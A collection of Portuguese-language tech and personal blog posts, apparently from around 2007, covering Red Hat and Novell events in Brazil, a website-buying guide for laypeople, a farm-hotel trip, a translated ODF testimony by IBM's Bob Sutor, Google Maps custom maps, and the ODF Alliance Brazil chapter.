Festa no Novo Escritório da Red Hat Brasil

A Red Hat comemorou hoje seu novo escritório num dos edifícios mais novos e elegantes de São Paulo.

Endereço do novo escritório da Red Hat

Muitos parceiros e clientes foram confortavelmente recebidos para um coquetel espaçoso num escritório colorido, decorado com uma mistura de cartazes de propaganda de produtos, e outros com a famosa frase de Gandhi que foi adotada pelo Open Source:

Primeiro eles te ignoram, depois eles riem de você, depois eles lutam contra você, e depois você vence.

A primeira coisa que chamava a atenção era a “Sala de Descompressão”, onde o pessoal pode relachar jogando games. Mas depois nos levaram para conhecer as espaçosas salas de reunião, as bem equipadas salas de aula, e as salas dos gerentes.

Havia realmente muito espaço que eles pretendem preencher com novas contratações de vendedores, sales engineers, pessoal de marketing etc. E havia ainda a outra metade inteira do andar para mobiliar e ocupar. Mas em pequenos passos.

A Red Hat (ou Rêd Hétchi, como diz Alejandro Chocolat, argentino gente boa que comanda a empresa no Brasil) inaugurou sua operação por aqui ao comprar a Latin Source, empresa que já os representava no cone sul.

Estavam todos presentes: Chocolat com seu inconfundível sotaque, Julian, Gabriel Szulik (com o mesmo sobrenome do diretor mundial da empresa, mas que afirma não ser parente dele), Rodrigo Missiagia e suas belas camisas caneladas, Filipe absorvido em resolver o problema de um cliente, David Barzilay com um terno novo e bonito, Leticia, Edgar (o sopro Java/JBoss na equipe técnica de vendas), Paulo Banitz e outros tantos que lamento não lembrar o nome.

O ar da empresa tem um quê de Google: aquele ambiente descontraido onde todos trabalham por prazer, fazem o que gostam, e ainda estão na ponta da tecnologia. Eles pretendem dobrar de tamanho em um ano.

Há um lado oculto da empresa: o laboratório de tecnologia. É oculto porque seus membros não ficam muito a vista, imersos em melhorar o kernel do Linux, o JBoss, e escovar outros bits. É o lar de figurões como Marcelo Tosatti, Acme e outros.

A conversa com o Edgar, figura Java, foi particularmente interessante. Ele veio da Summa e está a uma semana na Red Hat. É o primeiro da empresa que tem a missão de falar sobre JBoss com o mercado. Contou que muitos clientes já usam JBoss gratuitamente, e que agora é hora de provar o valor de terem também suporte comercial. Contei que achava muito importante a Red Hat ter comprado a JBoss. Na linha do tempo de decidir qual tecnologias adotar, uma empresa pensa antes na plataforma de aplicações (coisas como o JBoss, WebSphere, middleware em geral), e só depois no sistema operacional (Linux). No tecnês do dia a dia, dizemos que sistema operacional é um mal necessário. Ter uma oferta tão estratégica e expressiva como o JBoss coloca a Red Hat numa posição adiantada nessa linha do tempo.

Resumo da ópera: a festa foi superdivertida e ótima para encontrar os amigos do nosso mundo de Linux comercial no Brasil.

Notas Sobre Evento de Virtualização da Novell no Rio

Ontem aconteceu o evento de Virtualização da Novell na primeira cidade brasileira: Rio de Janeiro.

Houve palestras ótimas da HP, AMD, Novell, e outros parceiros da Novell.

Roberto Brandão da AMD mostrou os detalhes arquitetônicos de seus novos processadores AMD-64 (Opteron). Gráficos esclarecedores sobre como os bits trafegam entre chipset, CPU, RAM, etc. Muito convincente. Contou também que o quadcore da AMD é o primeiro produto líder de mercado da companhia, com mais de 50% de share. Seus quadcore são realmente quatro CPU completas embutidas num chip só, incluindo gerência de memória autônoma, etc. Segundo ele, isso é mais difícil de fazer (mas traz melhores resultados de processamento e consumo de energia) do que a abordagem de dual-dual-core (dois dual core no mesmo chip), do concorrente, que não citou o nome.

Se eu tiver sorte, ele vai passar aqui no meu blog para contar mais. Roberto foi também o que mais se aprofundou nos detalhes da nova paravirtualização, e quase me deixou sem palavras. Eu tinha a pretensão de ser o único a dissecar este assunto…

Roberto contou que as novas versões do AMD-V vão ter novidades para I/O, e que estão melhorando o processador para que a virtualização tradicional (sem paravirtualização) seja mais eficiente. Obviamente essas características poderão ser aproveitadas por hypervisors de paravirtualização também.

Alexandre Gourdard da HP mostrou os blades e as abordagens que a HP tem para virtualização, tanto em Linux, Windows e HP-UX. Foi bastante focada em hardware e em serviços de gerência.

Richard Doll da Novell fez algumas apresentações. A mais interessante foi sobre o acordo com a Microsoft, e seus pontos de colaboração: (para) virtualização, gerência de identidade e federação de diretórios, formatos de documentos, administração de sistemas (integrando o Windows Updates com soluções da Novell), etc. Claro que a Microsoft quer engolir o mercado de Linux e vice-versa. Ninguém vai para o céu aqui (nem a comunidade Open Source). Mas acho que essa parceria tem pontos positivos.

Eu entrei envorgonhado porque os apresentadores antes de mim já tinham falado praticamente tudo que se podia falar sobre virtualização. Bem, virtualização de hardware somente. Mostrei a linha do tempo desse tipo de virtualização, como a IBM criou esse conceito em 1967, e até 1998 (ano de surgimento da VMWare) era a única que fazia isso. Até 2003, o ano que mudou tudo com a criação do Xen, e a reinvensão da Paravirtualização.

Mostrei os dados do Gartner que mostravam as “10 hipest technologies” para os próximos 18 a 36 meses, que tem virtualização no topo, seguido por Grid e SOA (que nada mais são do que formas diferentes de virtualização). Linux para aplicações importantes aparece em sétimo lugar.

Falei sobre virtualização de storage com o SAN Volume Controler, mostrando os benefícios em relação ao SAN tradicional.

Claro, falei sobre Xen explicando as diferenças em relação a virtualização tradicional. É incrível como todo mundo fala sobre Xen, mas não explica como e porque a parvirtualização é melhor. Acredito que se os defensores do Xen não deixarem isso claro na cabeça das pessoas, elas não vão comprar a idéia. É importante ressaltar isso.

Nas minhas tradicionais viagens filosóficas, depois de mostrar o Xen e seus benchmarks, levantei o seguinte: se a paravirtualização traz uma série de benefícios operacionais, a praticamente nenhum custo de performance, por que agora não podemos virtualizar a totalidade de nosso datacenter? Não só as pequenas instalações, mas também os grandes DBs, etc que geralmente são instalados em máquinas dedicadas. Serão máquinas paravirtuais rodando sobre um hardware dedicado. Isso é factível principalmente agora que o VMWare e virtualização da Microsoft implementarão paravirtualização também.

Fiz questão de ressaltar ao longo da apresentação que virtualização vai muito além do hardware. De fato, as virtualizações mais vantajosas, que trazem os melhores benefícios, são os que fazemos no nível do software. Isso levou a entrar no tema da virtualização invertida: Grid e SOA, onde a aplicação é maior que um computador (na virtualização de hardware, o computador é maior que a aplicação). O ponto aqui é repensar a forma como as aplicações são arquitetadas, modularizá-las, componentizar, e usar middleware para simplificar e “virtualizar” a infraestrutura. Parece que só eu falei sobre estes pontos.

No fim do evento vários clientes, parceiros, meu ex-chefe e o pessoal da Novell me comrpimentou dizendo que fiz a melhor apresentação.

Fiquei lisongeado e orgulhoso. Principalmente quando todas as outras apresentações foram tão boas.

Confira se o evento vai para sua cidade, e venha. É gratuito.

Arquivo da apresntação em ODF (5.1 MB) para OpenOffice.org e outros e em PDF (7.4 MB).

Como Criar um Website

Este guia é para você que é leigo em computadores, mas que precisa contratar alguém para fazer o site de sua empresa, restaurante, hotel, etc. Vai ajudá-lo a ter um site mais acessível, prático e funcional, usando padrões e técnicas novas e que os usuários gostam, e deixando de lado as técnicas não muito naturais da web, ou que não é de boa prática o seu uso.

Quando for comprar serviços para criar seu site, exija os seguintes pontos (os links levam para as explicações):

  1. Quero um site onde eu mesmo posso atualizar o conteúdo, como se fosse um blog.
  2. Onde hospedar o site, em que computadores ele vai rodar ?
  3. O site/blog não pode ser feito em Flash.
  4. O site/blog deve ser compatível com qualquer browser em qualquer plataforma, principalmente Firefox, Internet Explorer, Safari e Opera.
  5. Não é necessário ter uma animação de abertura.
  6. Não pode haver popups nem frames, deve ser de fácil navegação e usar permalinks semânticos.
  7. O site/blog deve conter informações objetivas e precisas.
  8. O site/blog deve usar tecnologias abertas e não-proprietárias.

Seguem os detalhes de cada ponto…

Não se chama mais site, agora é blog

Blogs estão na moda, então entre na moda.

Não é a toa. Se você disser “entre no blog do meu restaurante” ao invés de “site”, as pessoas sabem que estarão mais próximas de quem criou a informação ali, e não só da informação em sí. Na cabeça das pessoas, um site raramente é atualizado, mas um blog sempre tem novidades. O já conhecido formato de blog sugere que os visitantes poderão interagir, comentar.

Não conte para ninguém, mas site e blog são praticamente a mesma coisa, mas optando pelo formato de blog abre um leque de opções do uso de ferramentas já prontas para facilmente gerenciar seu conteúdo. Isso significa que seu site (ou blog) ficará pronto mais rápido (instantaneamente, na verdade), com mais funcionalidades, nasce bonito, e organizado de um jeito já familiar para as pessoas, além de ser interativo.

Outra vantagem de um blog é que você mesmo vai poder configurar e atualizá-lo tão facilmente quanto escreve um e-mail.

O visual de um sistema de blog como o WordPress é definido pelo tema usado. A idéia de temas pode ser comparada a uma roupa que se veste: troque de roupa e mude seu visual sem tocar no conteúdo, da mesma forma que troca-se o tema de seu blog sem interferir no conteúdo textual etc.

Há uma infinidade de temas gratuitos genéricos prontos na web, mas para uma empresa, estabelecimento, etc o ideal é contratar um webdesigner para criar (ou adaptar) um tema específico, com o seu logotipo e a sua cara. O trabalho técnico para executar esse trabalho dura aproximadamente 1 semana, e no caso do WordPress.org, o webdesigner deve ter conhecimento de PHP, além dos básicos XHTML e JavaScript (não precisa lembrar esses nomes, só garanta que seu webdesigner conhece tais tecnologias).

Em que computadores seu site vai rodar, onde hospedar ?

O custo mensal para se ter um blog/site é baxíssimo. No Brasil pode-se contratar excelentes provedores de espaço como a Insite por aproximadamente R$16 por mês. Já incluso todas as ferramentas necessárias para criar o blog, como o WordPress.org.

DreamHost bannerO provedor que escolhi para este meu site é o DreamHost que fica nos EUA. Por uns R$70 por ano eles me dão 230GB de espaço, mais banda praticamente ilimitada e um ótimo serviço. Alí pode-se rodar um blog WordPress.org, ou outros softwares que facilitarão a sua vida para gerenciar o conteúdo, seja textos, fotos, multimídia, etc: Drupal, Joomla, Gallery etc.

Seu site vai morar em computadores que rodam Linux (por oferecer maior segurança e estabilidade) e seus usuários Linux, Windows, Mac ou qualquer outro poderão navegar nele sem problema.

Evite Flash

Flash é a tecnologia que permite animações bonitinhas em sites da web, mas que começou a ser impropriamente usada para fins mais centrais de alguns sites, até o ponto enlouquecido de o site inteiro ser feito em Flash.

É ruim para seus visitantes: Flash é uma tecnologia proprietária, e nem todos os seus visitantes vão tê-lo instalado. E os que tiverem talvez o terão numa versão antiga (você lembra de ter atualizado seu Flash alguma vez?). Visitantes que usam Linux por exemplo — 20% da web aproximadamente — em geral não tem. Não exclua seus usuários.

É ruim para seu blog: Há uma ciência oculta na web chamada Search Engine Optimization (ou Otimização Para Sistemas de Busca), em que profissionais especializados conseguem fazer um site aparecer no topo da pesquisa por palavras em sites como o Google, Yahoo, MSN Search, etc. Bem, qualquer palavra ou link (isso inclui menus que levam ao texto) contidas em arquivos Flash serão invisíveis ao Google, fazendo seu blog praticamente desaparecer em resultados de busca. Os potenciais clientes que usam o Google e companhia para procurar coisas que você vende também desaparecerão.

Use Flash somente em coisas marginais e mesmo assim em elementos que não interferem na informação que seu site/blog provê.

Existem outros browsers

Lembre-se que o browser que você e seu produtor de site usam pode não ser o mesmo de todos os seus visitantes. O Firefox já usado por uns 30% da web. Para acertar neste ponto, garanta que seu blog é bem visto no Firefox, Safari (popular no Mac), Opera (popular em celulares) e Internet Explorer.

A Internet não é um panfleto de propaganda

Uma das coisas mais inúteis e irritantes de muitos sites é a tal da apresentação inicial, geralmente feita em Flash. Claro que há o link para “pular a animação” mas se este também estiver embutido no Flash pode dizer adeus a alguns visitantes: o resto de seu site é inacessível e contribui para a tal exclusão digital.

Um panfleto é recebido na rua de forma passiva, e a capa deve ser atraente para que o usuário queira abrir e ver o resto. Na Internet é diferente. Dificilmente alguém vai “cair” no seu site por acaso. As pessoas ativamente te clicaram porque acreditam que você tem a informação que elas precisam. Não as aborreça com essas apresentações iniciais. Em suma, isso só serve para duas coisas: dar uma desculpa ao webmaster que você contratou para te mostrar seus conhecimentos em operar o programa que cria aquilo, e gastar seu dinheiro pelas horas de trabalho cobradas.

Use melhor as horas pagas ao seu web-designer e peça para ele criar um site/blog semântico, que os mecanismos são capazes de ler.

Morte aos Popups

Sobre as tais janelas saltitantes que surgem quando clicamos em links de sites mal feitos, saiba que browsers modernos corretamente as bloqueiam. Se você as vê na hora que está testando seu site pela primeira vez, provavelmente foi porque o browser foi explicitamente configurado para deixá-las saltar. Em geral seus usuários não as verão.

Os popups tem outro sério problema: em sites mal feitos, certas informações preciosas só podem ser encontradas dentro de popups, e como essas janelinhas estão fora do fluxo de navegação normal (como Flash) essas informações também serão invisíveis ao Google e companhia, e não aparecerão nos resultados de busca.

Estabeleça a idéia de que todo pedaço de informação em seu site deve poder ser acessível diretamente por links externos (também conhecidos por “permalinks“), e não só navegando via a página principal.

Seus clientes querem te ligar

Você ficará surpreso em saber quantas pessoas tem preguiça de ler ou gastar 5 minutos (ou mais, se o site for desestruturado) navegando em seu blog para encontrar o que procuram.

Para aproximá-las de você, deixe seu telefone com código de área visível em todas as páginas, por exemplo no final de cada uma. Só e-mail não basta. Muito menos formulário para entrar em contato. Lembre-se: de qualquer forma, antes da Internet o único jeito de contactarem seu estabelecimento era por telefone.

Se o seu estabelecimento for um serviço, restaurante, hotel, loja, vai perceber que a maioria liga para saber onde fica, preços, se está lotado, o que há no cardápio, etc. Quando as perguntas freqüentes ficaram óbvias, trate de criar páginas com respostas claras no seu site, mapas interativos como o abaixo, etc.

map
map
Restaurante Maha Mantra
map
Cantina do Mello

Evite tecnologias proprietárias

Use padrões abertos. Eles estão disponíveis, são mais baratos, e te dão mais flexibilidade que as tecnologias proprietárias.

Não é exatamente o webdesigner quem deve escolher as tecnologias usadas em seu site. Ele vai te sugerir as que ele conhece, mas não necessariamente são as melhores para você.

Um site/blog desenvolvido com tecnologias proprietárias te forçará a ter que pagar por elas pelo resto da vida de seu site. E saiba que a cultura da Internet criou diversas tecnologias abertas, muitas vezes melhores, muitas vezes gratuitas, que te dão escolha, poder de negociação, etc.

Veja uma comparação:

Tecnologias Proprietárias (evite) Tecnologias Abertas (prefira)
Flash DHTML, Ajax, XHTML+JavaScript
ASP, ASP.NET JSP, PHP
.NET, C#, Cold Fusion, Delphi etc Java, Java Enterprise ou J2EE
Windows ou qualquer outro sistema operacional Linux
Mídia em formatos WMA, WMV e Real Mídia em formatos MP3, AAC, MPEG e Xvid (ou DivX)

Outros detalhes

  • Seu site ou blog deve usar a codificação UTF-8 ou Unicode. Esta técnica é a garantia de que acentos vão aparecer corretamente em qualquer browser e sistema operacional.
  • Evite também frames. Eles nasceram a partir de um erro de projeto, são considerados obsoletos, tem problemas similares aos popups e Flash, violam padrões, e seus criadores se arrependeram de te-los criado.

Borboletas do Japi

A 40 minutos de São Paulo está um dos melhores lugares para se passar um feriado: Fazenda Montanhas do Japi. E foi justamente nesse ótimo hotel fazenda que passamos a última Páscoa.

Encrustado nos pés da área de preservação da Serra do Japi, é longe o suficiente para abafar o barulho da cidade, e perto o suficiente para não haver desculpas nem dramas para cair na estrada. Logo ali, em Jundiaí.

(interaja com o mapa para conhecer a região)

O hotel fazenda é um complexo de 8 lagos rodeado por morros de mata virgem e flores perfumadas. É muito bem cuidado, com bosques de árvores, campos de grama aparada e borboletas, muitas borboletas. Uma visão bucólica do paraíso.

Casa principalA Casa de Pedra é a principal e tem uns 3 quartos para hóspedes, lounge, lazer, etc, e fica na subida de um morro, de frente para o lago principal, o que lhe confere uma bela vista de contemplação. Mas ficamos na Casa Gênio, afastada uns 400m (veja no mapa) e praticamente no meio do mato, com 2 suites, sala, cozinha e varanda, cujo caminho até a casa principal passa por um bosque de amoreiras, com borboletas por toda parte.

Suzana e Hanah lideram tudo não como donas de uma pousada, mas como anfitriãs em sua sala de estar, almoçando junto e contando as histórias de gerações passadas da família e da fazenda, a relação da região com a cultura da uva, e depois eucaliptos, etc.

A casa principal foi construída sobre ruínas seculares de jesuítas. Para evitar intervenções de estilos muito contrastantes, toda a arquitetura nova é rústica, mas com um inconfundível toque feminino e confortável. As constantes borboletas dão o toque final ao visual leve e colorido.

Trilhas na mataPara os aventureiros há as trilhas por dentro da Serra do Japi, beirando rios de águas cristalinas, árvores primárias, perdendo-se e achando-se ao sair em outro ponto inesperado da fazenda, despreocupadamente, guiado pelas infindáveis borboletas.

É tão perto que no sábado chamamos os amigos de São Paulo para virem almoçar e passar o dia, nadar no lago, remar no caiaque, andar a cavalo, contemplar as borboletas na paisagem florida.

É tão longe que a noite vimos um céu escuro e estrelado, típico dos lugares afastados. Aí a lua cheia logo nasceu e mandou as estrelas embora. Mas no dia seguinte, as borboletas continuavam lá.

Os bons cavalos nos levaram ao topo de um morro cuja paisagem lembrava Stonehenge. Muitas rochas. E borboletas. E o Pico-do-Jaraguá lá longe.

As redes sob os eucaliptosFazer três refeições daquelas por dia era desencorajador para nós, visitantes deslumbrados com a leveza de tantas borboletas. No café da manhã, além dos bolos e pães caseiros, deixavam umas chapas de ferro sobre o fogão a lenha para prepararmos nossos próprios sanduíches ou panquecas. Tinha que preparar sempre dois: um para matar a fome e outro para exercitar a pretensão de sanduicheiro-chapeiro-cozinheiro.

O almoço era concorrido com quem só vinha passar o dia, mas ao sentarmos nas mesas da varanda alta, contemplando os lagos e as borboletas, tudo se acalma. Se demandávamos demais do almoço, as redes de balanço sob o bosque de eucaliptos gigantes nos chamavam para um cochilo. Quanto mais altos, mais sensíveis são os eucaliptos às brisas que vem e vão, e juntos formavam o sonoro coro da canção de ninar que combinava com a rede.

Mesas na varanda altaO sino do lanche da tarde nos despertava, e aí as estrelas eram o suco de erva cidreira e a torta de banana com aveia.

À noite prometíamos tomar só uma sopa, mas não dava para resistir. A situação se complicou no sábado à noite: o forno de pizza estava quente, e a pretensão de cozinheiro pôde novamente ser exercitada ao montar as deliciosas redondas. Era a última noite.

No domingo choveu como o batismo dos céus. As borboletas foram se esconder, mas não por muito tempo. Logo voltaram.

Mas já era hora de partir. O consolo ao voltar para São Paulo era o céu de um cinza homogêneo e denso como uma redoma, mas às seis da tarde o sol atravessava-o por baixo alaranjando toda a cidade. Era um lindo jogo de contrastes brilhantes e cinzentos que fez surgir um arco-íris intenso estampado sobre o cinza. Pudemos vê-lo inteiro, de ponta a ponta. Cena de rara beleza na cidade.

Naquela hora, já em São Paulo, lembramos das borboletas. E sentimos saudades delas.

(fotografias e seus autores estão no site da fazenda)

Pré-FISL em São Paulo

Acabei de sair do evento Pré-FISL em São Paulo, organizado pela 4Linux.

Foi ótimo. Com palestras e palestrantes de alta qualidade. Confira:

  • Josh Berkus, do PostreSQL, esclareceu a evolução do projeto e comunidade. Contou que a versão 8.3 do PostreSQL vai suportar DBs de vários terabytes, e que a performance da versão 8.2 atual já é comparável com o MySQL. Contou também que os nichos do PostreSQL e do MySQL são diferentes. O primeiro está focado em grandes bancos, enquanto o MySQL tende a usos exóticos ou a bancos pequenos ou até em RAM. Sobre suporte a XML do PostgreSQL mostrou os primeiros passos, mas explicou que não chegam nem perto do DB2 nesse ponto. Outro gráfico interessante é a relação do custo-benefício comparado a um “banco de dados proprietário” de cor vermelha: 80% do benefício por 15% do custo total de propriedade.
  • Maddog fez uma apresentação de tom idealista sobre thin clients, contando como terminais burros eram usados antigamente e a vida das pessoas era mais fácil. Argumentou que o projeto One Laptop Per Child é bonito mas o que importa não é o hardware e sim a conectividade em todo lugar. Quando questionei que muitas empresas já usam thinclient mas em Windows, e que o que falta é uma abordagem de mudança cultural menos infraestrutural e mais no nível das aplicações (convertendo-as para web ou para padrões abertos), ele disse que é só uma questão de volume. Quero ver… Seja como for, nós adultos também queremos um laptop conectado !
  • Jomar Silva, diretor geral da ODF Alliance Brasil, falou por uns minutos sobre ODF e sua importância para os usuários, empresas e desenvolvedores de aplicações.
  • Cezar Taurion falou pela IBM com uma palestra entitulada “Renascimento 2.0”, onde usou seu raciocínio claro e pragmático para explicar o modelo Open Source, e como ele se encaixa num modelo empresarial. Falou sobre o conceito Long Tail e como ele está relacionado a era do Mundo de Pontas.
  • Kristian Kielhofner falou sobre o Asterisk. Muito interessante. Mas a maior sensação foi seu celular Nokia que suporta SIP. Ou seja, para qualquer contato de sua lista telefônica, ele pode fazer uma ligação normal (por GSM) ou por VoIP, gastando bytes de seu plano IP (mais barato) e economizando minutos de seu plano de voz (mais caro). Segundo ele, os aparelhos Nokia da linha E e N estão anos a frente de qualquer outro fabricante por sua integração com VoIP. Ele consegue rotear seu ramal do trabalho, ou seu telefone de casa para seu celular, não por followme, mas por IP — Nokia é o celular dos geeks. Mostrou também um gadget que parece um isqueiro com porta ethernet: trata-se de um computador com WiFi que tem 256MB de RAM e AstLinux já instalado, boota em segundos com Linux, Asterisk e um firewall, e lhe serve como uma central telefônica portátil para viagens.
  • Amauri Zavatin, da Caixa Econômica, impressionou todos contando como o banco social está aos poucos usando Linux em todos os lugares. Dentro de um ano, todos os terminais dos caixas e ATM serão thin clients Linux. BrOffice.org já está sendo massivamente usado, com ordem da presidência, e há prazo de 6 meses para desinstalar o MS Office. Intranet foi toda redesenvolvida em Java e Zope, e está servindo como piloto para a próxima Internet do banco. Diminuiram em 70% os gastos com impressão porque começaram a controlar seu uso com ferramentas open source. Des-terceirizaram todo o negócio das casas lotéricas (por causa das notícias de corrupção) redesenvolvendo todas as aplicações internamente com Java e Linux, e o projeto saiu por uma fração do que foi previsto. Etc etc etc. Esta palestra serviu como um termômetro do uso de Open Source de forma corporativa, responsável e séria.
  • Louis Suarez-Potts, da Collab.net, fez uma palestra emocionada sobre OpenOffice.org e ODF, convocando mais colaboradores para os diversos projetos atrelados ao OOo. Explicou que pode-se contribuir para a suite em sí, mas também para os subprojetos de marketing, empacotamento, artwork, testes, plugins e extensões.

O evento fechou com um coquetel informal onde reencontrei velhos amigos como o Luiz Blanes e outros.

A casa estava cheia, e espero que o evento se repita ano que vem. Tem tudo para se tornar tradição em São Paulo.

Um Tratado sobre Padrões Abertos e ODF

Bob Sutor, diretor da IBM que tem a missão de fomentar Padrões Abertos e Open Source no mercado, tem também a responsabilidade de comunicar a importância do OpenDocument Format (ou ODF).

Publicou em seu blog um pronunciamento feito ao congresso do estado do Texas, que está em fase de votar uma lei a favor da adoção do ODF. É um tratado edificante sobre a importância social e mercadológica dos Padrões Abertos (instanciados aqui no ODF). As idéias e raciocínio deste documento podem ser facilmente adaptados para serem ouvidos por qualquer orgão governamental, instituição pública ou privada do Brasil também, quanto mais agora devido a criação da nossa própria Aliança ODF.

Eis uma tradução integral:

2007/04/09: Revisada a tradução, a semântica, sintaxe e gramática por Tatiana Cymbalista.

Boa tarde/noite, Sr. Presidente e membros do Comitê. A IBM apóia este projeto de lei. Este projeto de lei trata do futuro, de mais concorrência e inovação e de dar mais opções para o Texas. É completamente consistente com a direção tecnológica e de propriedade intelectual da indústria do software.

Os atuais formatos de arquivos nos quais alguém grava documentos de escritório, usados pela maioria dos senhores e de seus cidadãos, são baseados em tecnologias e práticas dos anos 70, 80 e 90, pelas quais algumas companhias “prendiam” clientes a seus produtos e atualizações. Isso não é mais aceitável hoje em dia.

Quando os senhores e seus cidadãos encontram-se realmente restritos a um único fornecedor de software para acessar informações governamentais, vocês e eles pagam o que eu considero taxas. Padrões abertos evitam isso.

A primeira taxa é a diferença entre o que você precisa pagar para aquele fornecedor versus o custo mais baixo que pagaria se múltiplos fornecedores existissem e os preços tivessem que ser competitivos. Você também teria que pagar uma taxa de inovação. O fornecedor único tem motivos limitados para melhorar o produto. Idéias refrescantes de atores novos como os empreendedores do Texas, são mantidas fora da categoria do produto. Isso é ruim.

Aqueles que são contrários a este projeto de lei estão, em essência:

  • confortáveis em ter um único fornecedor;
  • satisfeitos com as políticas de licitação que permitem haver um único fornecedor de software de documentos para o governo;
  • razoavelmente felizes em pagar as taxas financeiras e de inovação acima.

A IBM não se contenta com este status quo. Nem os autores desse projeto de lei. Nem a maioria das indústrias; aquelas nas áreas de ciências naturais, educação, saúde, e assim por diante, que estão tendendo para padrões abertos. Com o advento da Internet, beaseada em padrões abertos como HTML, o valor dos padrões abertos reais tem sido comprovado.

Pensem sobre quão mais fácil, mais acessível, mais transparente é para vocês colaborar dentro do governo e se conectar com seus cidadãos graças à Internet e ao correio eletrônico, a blogs e a tudo aquilo que surgiu a partir de padrões abertos. É chegada a hora de levar esse poder de colaboração aos documentos e abri-los, dando controle aos governos e escolha aos cidadãos.

A IBM se juntou aos nossos colegas da indústria para trabalhar em um padrão aberto para formatos de arquivos, chamado de OASIS/ISO OpenDocument Format (ODF). Formatos de arquivos são meras especificações de como um documento é estruturado — cabeçalhos, rodapé, parágrafos — e de como ele deve ser salvo e intercambiado. O formato OpenDocument tem sido desenvolvido aberta e ativamente por uma comunidade global de especialistas de muitas organizações e tem sido amplamente implementado por vias independentes, tanto de código fonte aberto como proprietário.

Sua taxa de adoção está aumentando. Adolescentes estão usando-o. Políticos estão usando-o. Alguns diretores de tecnologia em organizações que oficialmente só usam formatos proprietários estão usando ODF em casa, quando chega a hora de gastar seu próprio dinheiro e experiência técnica para escolher produtos para seu uso pessoal. A enorme e crescente base de usuários de Open Office está gravando e distribuindo arquivos em formato ODF. A próxima geração do Lotus Notes da IBM irá suportá-lo ainda este ano.

Então por que vocês precisam de legislação sobre isso ?

Primeiro, porque o Texas, como um estado soberano e uma potência no mercado de TI, deve, na minha opinião, ser capaz de fazer o que bem entender com os documentos de escritório que cria. Isso se aplica aos documentos de hoje, mas também aos documentos que serão criados amanhã e que serão os registros históricos daqui a cinqüenta anos. Vocês têm a oportunidade de claramente afirmar a posição de que o Texas não será refém de nenhum fornecedor para acessar as informações do próprio estado.

Segundo, porque as mudanças estão acontecendo agora e os usuários vão, ao longo do tempo, usar novas aplicações com novos formatos de arquivos baseados em documento. Eu nunca encontrei um diretor de tecnologia ou pessoa da área de finanças que me dissesse que nunca usará um novo software. Então, uma encruzilhada aproxima-se rapidamente e vocês precisam fazer uma escolha: escolher um único fornecedor e pagar essas taxas que mencionei, ou adotar formatos de documentos verdadeiramente abertos, que não são ditados por um único fornecedor, fomentam competição e inovação de várias origens e provêm verdadeira escolha de provedores e seus produtos.

Eu posso garantir que o software que teremos em cinqüenta anos vai funcionar de formas radicalmente diferentes e será fornecido por provedores completamente diferentes dos que conhecemos hoje. Devemos manter nossas opções abertas e, felizmente, com ODF temos uma excelente escolha comparada com qualquer alternativa. Além do mais, pessoalmente, eu apostaria na “inteligência das massas”, na coletividade de experts em TI que verdadeiramente domina padrões abertos e poderá nos preparar para o sucesso nos próximos anos. Depender de um único fornecedor para otimizar as ferramentas de seu próprio sucesso é solução do passado.

Em terceiro lugar, para ser claro, QUALQUER UM pode implementar um padrão aberto. Esse projeto de lei trata de escolha. ODF e padrões abertos para formatos de arquivos fomentam escolha de aplicações, usos inovadores da informação, mais competição e queda de preços. Pessoalmente, eu acho que essas coisas são boas.

Em conclusão, o mundo está se deslocando para padrões abertos, não-proprietários, baseado no incrível sucesso da Internet, um sucesso que foi bem mais importante do que a posição de mercado de um único fornecedor ou as suas idéias sobre o que seria correto para o mundo.
Nós podemos fazer isso novamente, mas temos que fazê-lo com cuidado. O Estado do Texas está em posição de mostrar aos seus cidadãos e ao mundo que esse sucesso pode ser repetido e que pretende liderar esse processo. O Texas pode mostrar que a frase “padrão aberto” significa mais do que um departamento de marketing de uma empresa diz que é.

Sr. Presidente e membros do comitê, padrões abertos de documentos são a apólice de seguro para seus documentos, em oposição ao risco de perda de documentos históricos esperando para acontecer. Eu vos agradeço pela oportunidade de testemunhar a favor do projeto de lei, e estou a disposição para responder a qualquer dúvida que tiverem.

Mapas Personalizados no Google Maps

Confira o novo Google Maps, que já era na minha opinião o serviço mais prático e legal da Internet.

A partir de hoje (não lembro de ter visto isso ontem) pode-se criar mapas personalizados com marcadores coloridos e balões com informações formatadas, como este mapa com legendas de Paraty e região.

Além do mais, pode-se exportar essas informações para um arquivo KML, importável no Google Earth. Mas como KML é um idioma XML aberto, pode-se usa-lo como meta informações geográficas em quaisquer outras aplicações. A imaginação do desenvolvedor de aplicações é o limite. Discretamente, KML irá se tornar um padrão aberto e universal para descrever metainformações em mapas.

Havia desenvolvido um plugin para WordPress (ou qualquer outro sistema de blog, ou página simples) para embarcar mapas interativos dentro de posts, capaz de incrementar posts como este (na verdade, a maioria de meus posts sobre viagens tem mapas interativos). Ele ainda é muito prático, porque a API do Google Maps ainda não provê um serviço para desenhar os novos mapas personalizados fora do próprio Google Maps. Mas duvido que isso demore a acontecer, e quando acontecer, das duas uma: ou o plugin vai ficar muito mais simples, ou ele vai se tornar completamente obsoleto.

Eu sou tão fascinado por mapas que provavelmente fui um cartógrafo em outra encarnação.

E para quem não sabe, o Google Maps e o GMail são os sites populares que primeiro usaram os conceitos de AJAX.

Evento de Virtualização da Novell

Novell Virtualization Tour

Não podemos deixar de marcar nossa presença no evento de virtualização da Novell. Confira as datas e cidades:

Brasil América Latina

No track da IBM vou fazer uma apresentação nova sobre virtualização, incluindo o tema quente da paravirtualização, mas passando também por virtualização de storage, virtualização de aplicações, e outras virtualizações pouco conhecidas, até chegar nos conceitos de Grid e SOA que são as vertentes mais sofisticadas de virtualização.

Inscreva-se gratuitamente nos links acima e garanta sua vaga.

ODF Alliance in Brazil

Yesterday was announced the ODF Alliance Chapter Brasil, being the fourth country to create this initiative, after US, India and Poland.

The founder members are the Brazilian offices of IBM, Red Hat and Sun. Jomar Silva, the director, told me this:

My understanding is that the Brazilian [ODF Alliance] operation has the mission to execute the work proposed by the ODF Alliance in our country. We are partners and fight together the same battle, exchanging experiences (and this is a very important point) so lessons learned with migration and adoption of ODF in other countries (governments and companies) may be used here.

Many software support today reading and writing of documents in the OpenDocument format, being OpenOffice.org the most popular. The user gains freedom of choice, becomes able of negotiation, and can choose for the best price-benefit performance. This user-suppliers dynamics works as a fuel for innovation.

ODF, being based on open standards as XML, plus having a free license, plus to be already and ISO standard (two steps ahead of OOXML, proprietary competitor by Microsoft), is a mark in IT’s history, when for the first time the user is truly the independent owner of his documents. This is simply a very powerful idea.

The Brazilian chapter of the ODF Alliance will focus, in its first days, to setup its web site — probably at www.br.odfaliance.org —, and to define policies to accept new members as companies, institutions, user groups and communities.

ODF Alliance, Capítulo Brasil

